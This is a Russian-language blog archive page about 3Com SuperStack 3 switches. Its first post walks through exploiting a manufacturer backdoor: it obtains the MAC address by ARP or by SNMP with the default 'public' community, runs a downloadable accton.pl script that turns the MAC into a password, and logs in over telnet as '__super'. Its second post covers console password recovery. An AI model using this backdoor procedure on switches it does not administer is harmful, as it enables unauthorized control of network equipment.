Archive for 3Com

Взлом пароля на свитче 3Com SuperStack 3 backdoor

// Июнь 17th, 2013 // No Comments » // 3Com, hack, recovery password, switch

Оказалось, что линейка свитчей 3Com SuperStack 3 (а еще и некоторые свитчи Dell, SMC, Foundry и EdgeCore) вовсе не 3Com, а Accton. В документации к бэкдору упоминаются модели 3Com 3812, 3Com 3870, Edgecore ES4649 и Dell PowerConnect 5224, я проводил эксперимент на 3Com 3226 и 3250.

Суть бэкдора в том, что производитель заложил возможность авторизоваться на свитче зная его мак, который скриптом можно превратить в пароль, естественно все работает только в том случаи если у вас есть доступ к свитчу по telnet/ssh или http.

Для начала начала, нужно раздобыть мак адрес, если свитч находится в одной L2 сети с вами достаточно сделать ping и посмотреть ARP таблицу, например так:

C:\>ping 10.28.28.28
Обмен пакетами с 10.28.28.28 по 32 байт:
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Статистика Ping для 10.28.28.28:
    Пакетов: отправлено = 4, получено = 4, потеряно = 0 (0% потерь),
Приблизительное время приема-передачи в мс:
    Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек

C:\>arp -a 10.28.28.28
Интерфейс: 10.28.28.28 --- 0x10005
  Адрес IP              Физический адрес      Тип
  10.28.28.28           00-12-a9-c9-ac-c0     динамический

Если свитч находится за маршрутизатором, можно попробовать достать его мак через протокол SNMP, если его администратор не отключил или не поменял комьюнити по умолчанию.

$ snmpget -v1 -c public 10.28.28.28 IF-MIB::ifPhysAddress.1001
IF-MIB::ifPhysAddress.1001 = STRING: 0:12:a9:c9:ac:c0

Скачать скрипт accton.pl
запустить скрипт и в качестве параметра указать мак, с разделителем «:»:

./accton.pl 00:12:a9:c9:ac:c0
BUvypQd!

вот собственно «BUvypQd!» и будет пароль.
Подключаемся к свитчю через telnet, вводим логин «__super» и пароль, который сгенерировал скрипт:

$ telnet 10.28.28.28
Trying 10.28.28.28...
Connected to 10.28.28.28.
Escape character is '^]'.
Login: __super
Password: BUvypQd!

Menu options: -----------3Com SuperStack 3 Switch 3226-------------------------
 bridge              - Administer bridge-wide parameters
 feature             - Administer system features
 gettingStarted      - Basic device configuration
 logout              - Logout of the Command Line Interface
 physicalInterface   - Administer physical interfaces
 protocol            - Administer protocols
 security            - Administer security
 system              - Administer system-level functions
 trafficManagement   - Administer traffic management

Type ? for help.
--------------------------------3Com 3226 (1)--------------------------------
Select menu option:

Ссылка на описание бэкдора http://www.exploit-db.com/exploits/14875/

Сброс пароля 3Com SUPERSTACK 3 3226 3250

// Сентябрь 15th, 2012 // 1 Comment » // 3Com, recovery password, switch

3com 3226Подключится стандартным консольным кабелем, в параметра порта установить скорость 19200 (в некоторых инструкциях встречается еще загадочная скорость 18600).
Дождаться загрузки, на запрос логина ответить «recover» и пароль «recover». Появится надпись с предложением перезагрузить свитч и счетчиком обратного отсчета, в течении 30 секунд свитч нужно перезагрузить.
После перезагрузки, должно появится:

Enter the new password for the Administrator:

введите новый пароль для логина admin.